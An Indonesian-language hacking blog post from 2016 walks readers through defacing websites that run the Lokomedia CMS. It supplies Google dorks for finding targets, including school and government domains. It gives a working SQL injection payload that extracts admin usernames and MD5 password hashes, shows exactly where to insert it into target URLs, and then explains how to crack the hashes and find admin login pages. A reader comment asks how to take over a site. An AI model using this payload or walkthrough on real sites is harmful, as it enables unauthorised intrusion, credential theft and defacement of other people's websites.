Monday, September 5, 2016

DEFACE DENGAN CMS LOKOMEDIA !!!

Tags

WELCOME ANONYMOUS !!!

Pada kesempatan kali ini kami akan membahas bagimana cara deface menggunakan CMS Lokomedia !!! 

  Sekedar pengetahuan !!! Cms Lokomedia adalah CMS ( Content System Management ) Buatan karya anak bangsa, Kebanyakan orang menggunakan CMS ini untuk pribadi atau sekolahan, Jadi mohon untuk tidak merusak web tersebut. Tutorial ini cukup untuk di jadikan bahan pembelajaran terimakasih.


Hello Anonymous !!!

Langkah pertama untuk melakukan deface adalah mengenali dork bug di lokomedia, Berikut kumpulan dork yang telah kami siapkan !!!

inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
inurl:statis-1-visimisi.html
inurl:statis-1-tujuan.html 

NB : Kalian bisa kreasikan dork di atas sesuai kratifitas kalian, contohnya dengan menambahkan site:.go.id / net / sch.id / id . Contoh Dork ( site:id statis-1-visimisi.html )

Untuk Exploit CMS Lokomedia adalah
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Untuk Exploit apa perlu saya contohkan ?? Okeh baiklah
Contoh Web Target anda adalah www.ganteng.sch.id/statis-1-profil.html 
Silahkan masukan Exploit di belakang angka . Jadi Seperti ini  
 www.ganteng.sch.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html 
Jadi seperti itu hasil web yang telah di beri Exploit, Tapi bila anda menemukan Web yang memliki link seperti www.ganteng.sch,id/statis-1/profil.html Tetap anda taruh Exploitnya di belakang angka , jadi seperti ini  
www.ganteng.sch,id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+/profil.html 
Apa sejauh ini kamu udah paham sayang ?? eaaa :v
Langkah pertama taruh dork di Google / Mesin pencari lainya yang sering kamu pakai,
Cari Target sesuai hati kalian :)
Anggap lah kalian sudah menemukan target www.tamvan.id/statis-1-profil.html
Setelah mendapatkan Web target silahkan masukan exploit di belakang angkanya jadi seperti ini www.tamvan.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
Selanjutnya Tinggal kalian klik Enter, Maka akan muncul username dan password di atas judul websitenya ,

Setelah muncul tulisan username dan password di atas judul website, maka tinggal kalian tekan CTRL+U untuk melihat username dan password dengan jelas :D 
Ingat password masih berupa MD5 , Kalian bisa hash password di link ini http://md5online.org/ 
Selanjutnya adalah cari login adminya dengan cara menambahkan tulisan admin , Contoh
www.poli.go.id/admin
www.poli.id/adminweb
Kalo tidak bisa menemukan admin web, berati sudah di rubah oleh pemilik webnya,
SARAN !!! SEBELUM EXPLOIT LEBIH BAIK CARI ADMIN WEB TERLEBIH DAHULU !!!!
Sekian Tutorial Kali ini !!!
Thanks For Reading Guys !!!
Any Question ? Ask Me On Instagram @anon_cyber_team
Tutor By MR.TENWAP

1 comments so far

min kalo kita mau ambil alih sebuah web gimana min ?


EmoticonEmoticon

Edu-Secure